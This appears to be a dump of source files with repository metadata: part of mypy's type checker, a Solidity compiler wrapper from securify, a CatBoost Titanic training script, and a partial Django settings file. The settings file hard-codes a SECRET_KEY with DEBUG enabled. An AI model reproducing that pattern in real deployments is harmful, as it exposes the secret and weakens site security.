        if isinstance(subexpr_type, AnyType):
            iter_type = AnyType(TypeOfAny.from_another_any, source_any=subexpr_type)  # type: Type
        elif self.chk.type_is_iterable(subexpr_type):
            if is_async_def(subexpr_type) and not has_coroutine_decorator(return_type):
                # Yielding from a bare coroutine in an undecorated generator is invalid.
                self.chk.msg.yield_from_invalid_operand_type(subexpr_type, e)
            any_type = AnyType(TypeOfAny.special_form)
            generic_generator_type = self.chk.named_generic_type('typing.Generator',
                                                                 [any_type, any_type, any_type])
            iter_type, _ = self.check_method_call_by_name(
                '__iter__', subexpr_type, [], [], context=generic_generator_type)
        else:
            if not (is_async_def(subexpr_type) and has_coroutine_decorator(return_type)):
                self.chk.msg.yield_from_invalid_operand_type(subexpr_type, e)
                iter_type = AnyType(TypeOfAny.from_error)
            else:
                # A coroutine inside a @coroutine-decorated generator is awaited.
                iter_type = self.check_awaitable_expr(subexpr_type, e,
                                                      messages.INCOMPATIBLE_TYPES_IN_YIELD_FROM)

        # Check that the iterator's item type matches the type yielded by the Generator function
        # containing this `yield from` expression.
        expected_item_type = self.chk.get_generator_yield_type(return_type, False)
        actual_item_type = self.chk.get_generator_yield_type(iter_type, False)

        self.chk.check_subtype(actual_item_type, expected_item_type, e,
                               messages.INCOMPATIBLE_TYPES_IN_YIELD_FROM,
                               'actual type', 'expected type')

        # Determine the type of the entire yield from expression.
        if (isinstance(iter_type, Instance) and
                iter_type.type.fullname() == 'typing.Generator'):
            expr_type = self.chk.get_generator_return_type(iter_type, False)
        else:
            # Non-Generators don't return anything from `yield from` expressions.
            # However special-case Any (which might be produced by an error).
            if isinstance(actual_item_type, AnyType):
                expr_type = AnyType(TypeOfAny.from_another_any, source_any=actual_item_type)
            else:
                # Treat `Iterator[X]` as a shorthand for `Generator[X, None, Any]`.
                expr_type = NoneTyp()

        if not allow_none_return and isinstance(expr_type, NoneTyp):
            self.chk.msg.does_not_return_value(None, e)
        return expr_type
    def visit_temp_node(self, e: TempNode) -> Type:
        # A TempNode carries a precomputed type; just return it.
        return e.type
    def visit_type_var_expr(self, e: TypeVarExpr) -> Type:
        # A TypeVar() definition has no useful expression type of its own.
        return AnyType(TypeOfAny.special_form)
    def visit_newtype_expr(self, e: NewTypeExpr) -> Type:
        # A NewType() definition has no useful expression type of its own.
        return AnyType(TypeOfAny.special_form)
    def visit_namedtuple_expr(self, e: NamedTupleExpr) -> Type:
        """Type check a NamedTuple(...) definition expression.

        Only validates the synthesized tuple type for disallowed Any usage;
        the definition expression itself has no useful type.
        """
        tuple_type = e.info.tuple_type
        if tuple_type:
            if (self.chk.options.disallow_any_unimported and
                    has_any_from_unimported_type(tuple_type)):
                self.msg.unimported_type_becomes_any("NamedTuple type", tuple_type, e)
            check_for_explicit_any(tuple_type, self.chk.options, self.chk.is_typeshed_stub,
                                   self.msg, context=e)
        return AnyType(TypeOfAny.special_form)
    def visit_enum_call_expr(self, e: EnumCallExpr) -> Type:
        """Type check an Enum(...) call expression and infer member value types."""
        for name, value in zip(e.items, e.values):
            if value is not None:
                typ = self.accept(value)
                if not isinstance(typ, AnyType):
                    var = e.info.names[name].node
                    if isinstance(var, Var):
                        # Inline TypeChecker.set_inferred_type(),
                        # without the lvalue. (This doesn't really do
                        # much, since the value attribute is defined
                        # to have type Any in the typeshed stub.)
                        var.type = typ
                        var.is_inferred = True
        return AnyType(TypeOfAny.special_form)
    def visit_typeddict_expr(self, e: TypedDictExpr) -> Type:
        # A TypedDict() definition has no useful expression type of its own.
        return AnyType(TypeOfAny.special_form)
    def visit__promote_expr(self, e: PromoteExpr) -> Type:
        # The _promote() form carries its target type directly.
        return e.type
    def visit_star_expr(self, e: StarExpr) -> StarType:
        # A '*expr' unpacking expression wraps the operand's type in StarType.
        return StarType(self.accept(e.expr))
    def object_type(self) -> Instance:
        """Return instance type 'object' (builtins.object)."""
        return self.named_type('builtins.object')
    def bool_type(self) -> Instance:
        """Return instance type 'bool' (builtins.bool)."""
        return self.named_type('builtins.bool')
    def narrow_type_from_binder(self, expr: Expression, known_type: Type) -> Type:
        """Narrow *known_type* using any binder restriction recorded for *expr*.

        Only applies to expressions precise enough to be tracked by the
        binder (literal-like lvalues).
        """
        if literal(expr) >= LITERAL_TYPE:
            restriction = self.chk.binder.get(expr)
            # If the current node is deferred, some variables may get Any types that they
            # otherwise wouldn't have. We don't want to narrow down these since it may
            # produce invalid inferred Optional[Any] types, at least.
            if restriction and not (isinstance(known_type, AnyType)
                                    and self.chk.current_node_deferred):
                ans = narrow_declared_type(known_type, restriction)
                return ans
        return known_type
def has_any_type(t: Type) -> bool:
    """Return True if *t* contains an Any type anywhere inside it."""
    query = HasAnyType()
    return t.accept(query)
class HasAnyType(types.TypeQuery[bool]):
    """Type query that is true when any component is a (real) Any type."""
    def __init__(self) -> None:
        # 'any' combines child results: true if any component matches.
        super().__init__(any)

    def visit_any(self, t: AnyType) -> bool:
        return t.type_of_any != TypeOfAny.special_form  # special forms are not real Any types
def has_coroutine_decorator(t: Type) -> bool:
    """Whether t came from a function decorated with `@coroutine`."""
    if not isinstance(t, Instance):
        return False
    return t.type.fullname() == 'typing.AwaitableGenerator'
def is_async_def(t: Type) -> bool:
    """Whether t came from a function defined using `async def`."""
    # In check_func_def(), when we see a function decorated with
    # `@typing.coroutine` or `@async.coroutine`, we change the
    # return type to typing.AwaitableGenerator[...], so that its
    # type is compatible with either Generator or Awaitable.
    # But for the check here we need to know whether the original
    # function (before decoration) was an `async def`. The
    # AwaitableGenerator type conveniently preserves the original
    # type as its 4th parameter (3rd when using 0-origin indexing
    # :-), so that we can recover that information here.
    # (We really need to see whether the original, undecorated
    # function was an `async def`, which is orthogonal to its
    # decorations.)
    if (isinstance(t, Instance)
            and t.type.fullname() == 'typing.AwaitableGenerator'
            and len(t.args) >= 4):
        # Unwrap to the preserved pre-decoration return type.
        t = t.args[3]
    return isinstance(t, Instance) and t.type.fullname() == 'typing.Coroutine'
def is_empty_tuple(t: Type) -> bool:
    """Return True if *t* is a tuple type with no items."""
    if isinstance(t, TupleType):
        return len(t.items) == 0
    return False
def is_duplicate_mapping(mapping: List[int], actual_kinds: List[int]) -> bool:
    """Return True if multiple actuals illegally map to the same formal.

    Multiple actuals can map to the same formal only if they both come from
    varargs (*args and **kwargs); in this case at runtime it is possible
    that there are no duplicates, so the common f(..., *args, **kwargs)
    convention must be allowed.
    """
    if len(mapping) <= 1:
        return False
    is_star_star_pair = (len(mapping) == 2 and
                         actual_kinds[mapping[0]] == nodes.ARG_STAR and
                         actual_kinds[mapping[1]] == nodes.ARG_STAR2)
    return not is_star_star_pair
def replace_callable_return_type(c: CallableType, new_ret_type: Type) -> CallableType:
    """Return a copy of a callable type with a different return type."""
    return c.copy_modified(ret_type=new_ret_type)
class ArgInferSecondPassQuery(types.TypeQuery[bool]):
    """Query whether an argument type should be inferred in the second pass.

    The result is True if the type has a type variable in a callable return
    type anywhere. For example, the result for Callable[[], T] is True if t is
    a type variable.
    """
    def __init__(self) -> None:
        # 'any' combines child results: true if any component matches.
        super().__init__(any)

    def visit_callable_type(self, t: CallableType) -> bool:
        # True if an argument type matches, or the callable itself mentions
        # any type variable.
        return self.query_types(t.arg_types) or t.accept(HasTypeVarQuery())
class HasTypeVarQuery(types.TypeQuery[bool]):
    """Visitor for querying whether a type has a type variable component."""
    def __init__(self) -> None:
        super().__init__(any)

    def visit_type_var(self, t: TypeVarType) -> bool:
        return True
def has_erased_component(t: Optional[Type]) -> bool:
    """Return True if *t* is non-None and contains an ErasedType component."""
    if t is None:
        return False
    return t.accept(HasErasedComponentsQuery())
class HasErasedComponentsQuery(types.TypeQuery[bool]):
    """Visitor for querying whether a type has an erased component."""
    def __init__(self) -> None:
        super().__init__(any)

    def visit_erased_type(self, t: ErasedType) -> bool:
        return True
def has_uninhabited_component(t: Optional[Type]) -> bool:
    """Return True if *t* is non-None and contains an UninhabitedType component."""
    if t is None:
        return False
    return t.accept(HasUninhabitedComponentsQuery())
class HasUninhabitedComponentsQuery(types.TypeQuery[bool]):
    """Visitor for querying whether a type has an UninhabitedType component."""
    def __init__(self) -> None:
        super().__init__(any)

    def visit_uninhabited_type(self, t: UninhabitedType) -> bool:
        return True
def arg_approximate_similarity(actual: Type, formal: Type) -> bool:
    """Return if caller argument (actual) is roughly compatible with signature arg (formal).

    This function is deliberately loose and will report two types are similar
    as long as their "shapes" are plausibly the same.

    This is useful when we're doing error reporting: for example, if we're trying
    to select an overload alternative and there's no exact match, we can use
    this function to help us identify which alternative the user might have
    *meant* to match.
    """
    # Erase typevars: we'll consider them all to have the same "shape".
    if isinstance(actual, TypeVarType):
        actual = actual.erase_to_union_or_bound()
    if isinstance(formal, TypeVarType):
        formal = formal.erase_to_union_or_bound()

    # Callable or Type[...]-ish types
    def is_typetype_like(typ: Type) -> bool:
        # True for anything that behaves like a class object.
        return (isinstance(typ, TypeType)
                or (isinstance(typ, FunctionLike) and typ.is_type_obj())
                or (isinstance(typ, Instance) and typ.type.fullname() == "builtins.type"))

    if isinstance(formal, CallableType):
        if isinstance(actual, (CallableType, Overloaded, TypeType)):
            return True
    if is_typetype_like(actual) and is_typetype_like(formal):
        return True

    # Unions: similar if any item on either side is similar.
    if isinstance(actual, UnionType):
        return any(arg_approximate_similarity(item, formal) for item in actual.relevant_items())
    if isinstance(formal, UnionType):
        return any(arg_approximate_similarity(actual, item) for item in formal.relevant_items())

    # TypedDicts
    if isinstance(actual, TypedDictType):
        if isinstance(formal, TypedDictType):
            return True
        # Compare the TypedDict's dict fallback against the formal.
        return arg_approximate_similarity(actual.fallback, formal)

    # Instances
    # For instances, we mostly defer to the existing is_subtype check.
    if isinstance(formal, Instance):
        if isinstance(actual, CallableType):
            actual = actual.fallback
        if isinstance(actual, Overloaded):
            actual = actual.items()[0].fallback
        if isinstance(actual, TupleType):
            actual = actual.fallback
        if isinstance(actual, Instance) and formal.type in actual.type.mro:
            # Try performing a quick check as an optimization
            return True

    # Fall back to a standard subtype check for the remaining kinds of type.
    return is_subtype(erasetype.erase_type(actual), erasetype.erase_type(formal))
def any_causes_overload_ambiguity(items: List[CallableType],
                                  return_types: List[Type],
                                  arg_types: List[Type],
                                  arg_kinds: List[int],
                                  arg_names: Optional[Sequence[Optional[str]]]) -> bool:
    """May an argument containing 'Any' cause ambiguous result type on call to overloaded function?

    Note that this sometimes returns True even if there is no ambiguity, since a correct
    implementation would be complex (and the call would be imprecisely typed due to Any
    types anyway).

    Args:
        items: Overload items matching the actual arguments
        return_types: Return type of each matching overload item
        arg_types: Actual argument types
        arg_kinds: Actual argument kinds
        arg_names: Actual argument names
    """
    if all_same_types(return_types):
        # Identical return types can never be ambiguous.
        return False

    actual_to_formal = [
        map_formals_to_actuals(
            arg_kinds, arg_names, item.arg_kinds, item.arg_names, lambda i: arg_types[i])
        for item in items
    ]

    for arg_idx, arg_type in enumerate(arg_types):
        if has_any_type(arg_type):
            # Collect, per overload item, the formals this Any-typed actual maps to.
            matching_formals_unfiltered = [(item_idx, lookup[arg_idx])
                                           for item_idx, lookup in enumerate(actual_to_formal)
                                           if lookup[arg_idx]]

            matching_returns = []
            matching_formals = []
            for item_idx, formals in matching_formals_unfiltered:
                matched_callable = items[item_idx]
                matching_returns.append(matched_callable.ret_type)

                # Note: if an actual maps to multiple formals of differing types within
                # a single callable, then we know at least one of those formals must be
                # a different type then the formal(s) in some other callable.
                # So it's safe to just append everything to the same list.
                for formal in formals:
                    matching_formals.append(matched_callable.arg_types[formal])
            if not all_same_types(matching_formals) and not all_same_types(matching_returns):
                # Any maps to multiple different types, and the return types of these items differ.
                return True
    return False
def all_same_types(types: Iterable[Type]) -> bool:
    """Return True if every type in *types* is the same type (or it is empty)."""
    materialized = list(types)
    if not materialized:
        return True
    first = materialized[0]
    return all(is_same_type(t, first) for t in materialized[1:])
def merge_typevars_in_callables_by_name(
        callables: Sequence[CallableType]) -> Tuple[List[CallableType], List[TypeVarDef]]:
    """Takes all the typevars present in the callables and 'combines' the ones with the same name.

    For example, suppose we have two callables with signatures "f(x: T, y: S) -> T" and
    "f(x: List[Tuple[T, S]]) -> Tuple[T, S]". Both callables use typevars named "T" and
    "S", but we treat them as distinct, unrelated typevars. (E.g. they could both have
    distinct ids.)

    If we pass in both callables into this function, it returns a a list containing two
    new callables that are identical in signature, but use the same underlying TypeVarDef
    and TypeVarType objects for T and S.

    This is useful if we want to take the output lists and "merge" them into one callable
    in some way -- for example, when unioning together overloads.

    Returns both the new list of callables and a list of all distinct TypeVarDef objects used.
    """
    output = []  # type: List[CallableType]
    unique_typevars = {}  # type: Dict[str, TypeVarType]
    variables = []  # type: List[TypeVarDef]

    for target in callables:
        if target.is_generic():
            # Give the callable fresh typevar ids, then rename each fresh
            # typevar to the canonical one registered under its full name.
            target = freshen_function_type_vars(target)

            rename = {}  # type: Dict[TypeVarId, TypeVarType]
            for tvdef in target.variables:
                name = tvdef.fullname
                if name not in unique_typevars:
                    unique_typevars[name] = TypeVarType(tvdef)
                    variables.append(tvdef)
                rename[tvdef.id] = unique_typevars[name]

            target = cast(CallableType, expand_type(target, rename))
        output.append(target)

    return output, variables
| [
"hewang@mail.bnu.edu.cn"
] | hewang@mail.bnu.edu.cn |
92c6ec1b0ac953e0a1245895ca861e3111037464 | cfa1ef35dccc82950f4dde53a0e576fa56be05c5 | /scripts/pysolc.py | 070c3db1f95a65cf4da0d4fc9e636c4b88d99a9e | [
"Apache-2.0"
] | permissive | YakShavingCatHerder/securify | 08bb0b12b30a8b46f5a6bc388d343169c955330e | 51ba1240e60332b4a1e6ad02090da6fe57676354 | refs/heads/master | 2022-04-03T06:05:00.418130 | 2020-01-23T17:02:22 | 2020-01-23T17:02:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,052 | py | """
Author: Tobias Kaiser
Copyright 2018 ChainSecurity AG
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import re
import operator
from collections import namedtuple
from distutils.version import StrictVersion
import sys
import json
import subprocess
import logging
import time
import requests
import requests.exceptions
from solcx.main import _parse_compiler_output
from solcx.wrapper import solc_wrapper
from solcx.exceptions import SolcError
from solcx import get_available_solc_versions
from solcx import get_solc_folder
from solcx import install_solc
from .utils import find_node_modules_dir
MINIMAL_SOLC_VERSION = "0.4.11"  # oldest solc release this pipeline supports


class NoSolidityProject(BaseException):
    """Raised when a directory contains no solidity sources.

    NOTE(review): inherits from BaseException, so a plain
    ``except Exception`` will NOT catch it -- confirm this is intended.
    """
    def __init__(self, dirpath):
        # The directory that was scanned.
        self.dir = dirpath


class CompilerVersionNotSupported(BaseException):
    """Raised when no usable solc version satisfies the pragma constraints
    (or none could be installed).

    NOTE(review): also derives from BaseException; see NoSolidityProject.
    """
    pass
class SolidityCompilationException(SolcError):
    """SolcError enriched with the compiler version and files being compiled."""
    def __init__(self, solc_exception, solc_version, files):
        # Re-raise with the same payload as the wrapped SolcError...
        super().__init__(
            solc_exception.command,
            solc_exception.return_code,
            solc_exception.stdin_data,
            solc_exception.stderr_data,
            solc_exception.stdout_data,
            solc_exception.message
        )
        # ...plus the context of which compiler and inputs failed.
        self.solc_version = solc_version
        self.files = files


class OffsetException(Exception):
    """Raised for source-offset related errors."""
    pass
# GitHub API endpoint listing solidity compiler releases.
RELEASES_LIST = "https://api.github.com/repos/ethereum/solidity/releases"

# Sections requested from solc's --combined-json output.
OUTPUT_VALUES = ('abi',
                 'ast',
                 'bin-runtime',
                 'srcmap-runtime')
class SolidityVersion(StrictVersion):
    """A solidity version such as 0.4.24.

    Inherits comparison operators from StrictVersion and adds ``^`` (xor)
    to model solidity's caret pragma: ``a ^ b`` is true when both versions
    share the same major number and ``a``'s (minor, patch) is >= ``b``'s.
    """

    def __xor__(self, other):
        return self.version[0] == other.version[0] and \
            self.version[1:] >= other.version[1:]

    def __str__(self):
        s = super(SolidityVersion, self).__str__()
        # StrictVersion omits a zero patch component ("0.5", "0.10"), but
        # solc release tags always have three components.  The previous
        # check (len(s) <= 3) missed two-digit minors such as "0.10";
        # counting the separators handles every case.
        if s.count('.') == 1:
            s += '.0'
        return s
# Module-level cache of known solc releases (see get_supported_solc_versions).
_SOLC_VERSIONS = []
_SOLC_VERSIONS_LAST_UPDATE = 0

# One parsed pragma constraint: comparison operator + SolidityVersion.
OperatorVersionTuple = namedtuple('OperatorVersionTuple', ['op', 'v'])

# grouping matches into operator and version part
# e.g for >=0.4.24 it would group >= and 0.4.24
comp_version_rex = re.compile(r'(?P<operator>(<|>|>=|<=|\^)?)'
                              r'(?P<version>\d+\.\d+\.\d+)')

# Maps each pragma operator spelling to its comparison callable; the empty
# operator means exact equality, '^' uses SolidityVersion.__xor__.
ops = {
    '>': operator.gt,
    '<': operator.lt,
    '': operator.eq,
    '>=': operator.ge,
    '<=': operator.le,
    '^': operator.xor
}
def _get_binary(solc_version):
    """Return the filesystem path of the solc binary for *solc_version*.

    Raises AssertionError when that version has not been installed yet.
    """
    path = os.path.join(get_solc_folder(), 'solc-v{}'.format(solc_version))
    if os.path.exists(path):
        return path
    raise AssertionError('solc binary not found for version: {}'.format(solc_version))
def get_supported_solc_versions():
    """Return the sorted list of solc versions available for installation.

    The list is cached at module level for one hour.  If refreshing it
    fails (e.g. offline), the previously cached list is returned unchanged.
    """
    global _SOLC_VERSIONS
    global _SOLC_VERSIONS_LAST_UPDATE
    # Cache the result for one hour
    if len(_SOLC_VERSIONS) != 0 and _SOLC_VERSIONS_LAST_UPDATE >= time.time() - 3600:
        return _SOLC_VERSIONS
    try:
        new_versions = get_available_solc_versions()
        # Tags look like 'v0.4.24'; strip the leading 'v' before parsing.
        _SOLC_VERSIONS = sorted((SolidityVersion(v[1:]) for v in new_versions))
        _SOLC_VERSIONS_LAST_UPDATE = time.time()
    except requests.exceptions.RequestException:
        # If offline, work with installed versions
        logging.info('Fetching the latest compiler releases failed, relying on known versions.')
    return _SOLC_VERSIONS
def get_default_solc_version():
    """Return the newest supported solc version."""
    versions = get_supported_solc_versions()
    return versions[-1]
def parse_version(source):
    """Determine the solc version to use for the given source file.

    Reads the file's ``pragma solidity`` constraints and picks the oldest
    supported compiler satisfying all of them.
    """
    conditions = _parse_conditions(source)
    return _find_version_for_conditions(conditions)
def _find_version_for_conditions(conditions):
    """Pick the oldest supported solc version satisfying all *conditions*.

    With no conditions, the newest supported version is returned.  Raises
    CompilerVersionNotSupported when the constraints are unsatisfiable.
    """
    if len(conditions) == 0:
        return get_default_solc_version()

    def fullfills_all_conditions(v):
        # A candidate must satisfy every parsed pragma constraint.
        return all(map(lambda cond: cond.op(v, cond.v), conditions))
    try:
        # min() yields the oldest satisfying version; empty filter -> ValueError.
        return min(filter(fullfills_all_conditions, get_supported_solc_versions()))
    except ValueError:
        raise CompilerVersionNotSupported("Conflicting Compiler Requirements.")
def _parse_conditions(source):
    """Extract version constraints from a file's ``pragma solidity`` line.

    Returns a list of OperatorVersionTuple for the first non-experimental
    pragma line found, or an empty list when there is none.
    """
    with open(source, encoding='utf-8') as f:
        for line in f:
            if 'pragma' not in line or 'experimental' in line:
                continue
            return [
                OperatorVersionTuple(ops[op], SolidityVersion(version))
                for op, version in comp_version_rex.findall(line)
            ]
    return []
def compile_solfiles(files, proj_dir, solc_version=None, output_values=OUTPUT_VALUES, remappings=None):
    """Compile the given solidity files with an appropriate solc version.

    Args:
        files: list of .sol file paths to compile.
        proj_dir: project root, used for resolving remappings and allow-paths.
        solc_version: compiler version to use; if None it is derived from
            the pragma constraints across all input files.
        output_values: sections requested via --combined-json.
        remappings: optional 'name=path' remappings, relative to proj_dir.

    Returns:
        The parsed combined-json compiler output.

    Raises:
        CompilerVersionNotSupported: no suitable compiler found/installed.
        SolidityCompilationException: solc reported a compilation error.
    """
    def complete_remapping(remapping):
        # Turn a project-relative remapping target into an absolute path.
        name, old_path = remapping.split('=')
        new_path = os.path.join(proj_dir, old_path)
        return f'{name}={new_path}'

    if remappings is None:
        remappings = []

    remappings = [complete_remapping(remapping) for remapping in remappings]

    # Automatically remap a small whitelist of well-known node packages.
    node_modules_dir = find_node_modules_dir(proj_dir)

    whitelisted_node_modules = ['zeppelin-solidity', 'openzeppelin-solidity', '@daostack', 'rlc-token']

    if node_modules_dir is not None:
        for whitelisted_node_module in whitelisted_node_modules:
            whitelisted_path = os.path.abspath(os.path.join(node_modules_dir, whitelisted_node_module))
            if os.path.isdir(whitelisted_path):
                remappings.append(f'{whitelisted_node_module}={whitelisted_path}')

    if solc_version is None:
        if len(get_supported_solc_versions()) == 0:
            raise CompilerVersionNotSupported("No compiler available. No connection to GitHub?")
        # Union of pragma constraints over all files picks one compiler.
        all_conditions = []
        for source in files:
            all_conditions.extend(_parse_conditions(source))
        solc_version = _find_version_for_conditions(all_conditions)

    try:
        install_solc(f'v{solc_version}')
    except (requests.exceptions.ConnectionError, subprocess.CalledProcessError):
        raise CompilerVersionNotSupported(f'Failed to install v{solc_version} compiler.')

    binary = _get_binary(solc_version)

    combined_json = ','.join(output_values)
    compiler_kwargs = {
        'import_remappings': remappings,
        'allow_paths': proj_dir,
        'source_files': files,
        'solc_binary': binary,
        'combined_json': combined_json
    }

    try:
        stdoutdata, _, _, _ = solc_wrapper(**compiler_kwargs)
        return _parse_compiler_output(stdoutdata)
    except SolcError as e:
        # Wrap to preserve which version and files failed.
        raise SolidityCompilationException(e, solc_version, files)
def compile_project(path, remappings=None):
    """Compile every solidity (.sol) file found under *path*.

    Args:
        path: project root directory to scan for solidity sources.
        remappings: optional list of solc import remappings
            ('name=path', relative to the project root).

    Raises:
        NoSolidityProject: if the directory contains no .sol files.
    """
    sources = get_sol_files(path)
    if not sources:
        raise NoSolidityProject(path)
    # Fix: 'remappings' was previously accepted but silently dropped;
    # forward it to the compiler invocation.
    return compile_solfiles(sources, path, remappings=remappings)
def get_sol_files(project_root):
    """Return the solidity (.sol) files contained in the project.

    Files under node_modules and test directories are excluded, unless the
    project contains *only* test sources, in which case those are returned.
    """
    main_sources = []
    test_sources = []
    root_prefix_len = len(str(project_root))
    for dirpath, _, filenames in os.walk(project_root):
        relative = dirpath[root_prefix_len:]
        is_excluded = ('node_modules' in dirpath
                       or '/test/' in relative
                       or dirpath.endswith('/test'))
        bucket = test_sources if is_excluded else main_sources
        for filename in filenames:
            if filename.endswith('.sol'):
                bucket.append(os.path.join(dirpath, filename))
    # Only fall back to test sources when no regular sources were found.
    return main_sources if main_sources else test_sources
if __name__ == '__main__':
    # CLI entry point: compile PROJECT and write the combined-json result
    # to OUTPUT ('-' prints to stdout).
    if len(sys.argv) != 3:
        sys.exit('Usage: %s PROJECT OUTPUT' % sys.argv[0])
    res = compile_project(sys.argv[1])
    if sys.argv[2] == '-':
        print(res)
    else:
        with open(sys.argv[2], 'w') as fs:
            json.dump(res, fs)
| [
"noreply@github.com"
] | noreply@github.com |
440ce5170b6b74c30529ffd3efbb1496ea483d6e | 527344b91c7d06214888aa69605a05a3762caf47 | /pipeline.py | a58865fb11a81ce6ffdcd44f8624f9adc804114d | [] | no_license | ljing2007/gbm-pipeline | bdecf57643eefb74bb6ec36ef58b388ef54450f5 | 9a8b390012b07300f8635a10ea806b070f1c3d40 | refs/heads/master | 2022-04-30T12:30:14.039639 | 2020-04-05T12:17:04 | 2020-04-05T12:17:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,400 | py | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from catboost import CatBoostClassifier, Pool, cv
from catboost.datasets import titanic
def build_titanic_dataset():
    """Load the CatBoost titanic dataset and split it for training.

    Missing values are filled with the sentinel -999 so CatBoost treats
    them as a distinct category/value.

    Returns:
        (X, y, x_train, x_vali, y_train, y_vali, x_test, cate_feat_idx)
        where cate_feat_idx holds the indices of categorical feature columns.
    """
    df_train, df_test = titanic()
    df_train.fillna(-999, inplace=True)
    df_test.fillna(-999, inplace=True)
    X = df_train.drop('Survived', axis=1)  # X: train features
    y = df_train.Survived  # y: train labels
    # Columns whose dtype is not float are treated as categorical features.
    cate_feat_idx = np.where(X.dtypes != np.float)[0]
    x_train, x_vali, y_train, y_vali = train_test_split(X, y, train_size=0.75, random_state=42)
    x_test = df_test
    return X, y, x_train, x_vali, y_train, y_vali, x_test, cate_feat_idx
def catboost_cv_eval(X, y, cate_feat_idx, params):
    """Run 5-fold CatBoost cross-validation and print the best accuracy.

    Args:
        X, y: full training features and labels.
        cate_feat_idx: indices of categorical feature columns.
        params: CatBoost training parameters.
    """
    print('start catboost model cv eval...')
    cv_data = cv(Pool(X, y, cat_features=cate_feat_idx), params, nfold=5)
    print('Best vali acc: {:.2f}±{:.2f} on step {}'.format(np.max(cv_data['test-Accuracy-mean']), cv_data['test-Accuracy-std'][np.argmax(cv_data['test-Accuracy-mean'])], np.argmax(cv_data['test-Accuracy-mean'])))
    print('Precise vali acc: {}'.format(np.max(cv_data['test-Accuracy-mean'])))
def catboost_train_evel(x_train, y_train, x_vali, y_vali, x_test, params, cate_feat_idx):
    """Train a CatBoost classifier and report on it.

    Trains on (x_train, y_train) with (x_vali, y_vali) as the eval set,
    prints the validation accuracy and the training parameters, predicts
    labels/probabilities for x_test, and finally prints the per-feature
    importances sorted by score. (The 'evel' typo in the name is kept so
    existing callers are not broken.)
    """
    print('=============================================')
    print('catboost model training...')
    train_pool = Pool(x_train, y_train, cat_features=cate_feat_idx)
    vali_pool = Pool(x_vali, y_vali, cat_features=cate_feat_idx)
    model = CatBoostClassifier(**params, task_type='CPU') # sometimes GPU slower then CPU
    model.fit(train_pool, eval_set=vali_pool)
    print('=============================================')
    print('catboost vali acc: {:06.4f}'.format(accuracy_score(y_vali, model.predict(x_vali))))
    print('=============================================')
    print('catboost model training parameters:')
    for k, v in params.items():
        print('{:15}: {}'.format(k, v))
    print('=============================================')
    print('catboost model predicting...')
    test_pred_result = model.predict(x_test)
    test_pred_prob = model.predict_proba(x_test)
    # Show only the first few predictions as a sanity check.
    print(test_pred_result[:10])
    print(test_pred_prob[:10])
    print('=============================================')
    print('catboost feature importances evaluate...')
    feat_importances = model.get_feature_importance(train_pool)
    feat_names = x_train.columns
    feat_importances_df = pd.DataFrame()
    feat_importances_df['feat'] = feat_names
    feat_importances_df['score'] = feat_importances
    # Most important features first.
    feat_importances_df.sort_values(['score'], ascending=False, inplace=True)
    feat_importances_df = feat_importances_df.reset_index(drop=True)
    print(feat_importances_df)
def test_catboost():
    """End-to-end smoke run: build the Titanic dataset, then train and
    evaluate a CatBoost model with a fixed parameter set."""
    X, y, x_train, x_vali, y_train, y_vali, x_test, cate_feat_idx = build_titanic_dataset()
    params = {
        'iterations': 2000,
        'learning_rate': 0.01,
        'eval_metric': 'Accuracy',
        'logging_level': 'Verbose',
        'loss_function': 'Logloss',
        'use_best_model': True
    }
    # Cross-validation pass is disabled by default (slow); uncomment to run it.
    # catboost_cv_eval(X, y, cate_feat_idx, params)
    catboost_train_evel(x_train, y_train, x_vali, y_vali, x_test, params, cate_feat_idx)
if __name__ == '__main__':
    # Run the full training/evaluation pipeline when executed as a script.
    test_catboost()
| [
"goldandrabbit@foxmail.com"
] | goldandrabbit@foxmail.com |
6e38310be82e01e137cece99982ef936860d1f0b | 9ee644fdb3b0a5ae7887ecb1f4a9013b3abbcb8b | /Python/Django/dojo_ninjas/dojo_ninjas/settings.py | f3e07d741cff65ec58b50ed4eae76aa6c0bf3c86 | [] | no_license | avvarga/Lab206 | 0aa0bf7f1e0340466c5e120e7c1a8726f9385567 | c55fae4044625355ec392f3de58442b2767f7916 | refs/heads/master | 2021-04-15T15:42:11.700351 | 2018-04-13T23:07:25 | 2018-04-13T23:07:25 | 126,499,170 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,182 | py | """
Django settings for dojo_ninjas project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repository; rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = 'pq8*qkaf^%dwtrv&q#cz=cp)8nd7(4)l_&i$qgg!$@+5bth=a!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    # Project apps (listed before Django's contrib apps).
    'apps.likes_books',
    'apps.books_authors',
    'apps.dojoninjas',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dojo_ninjas.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
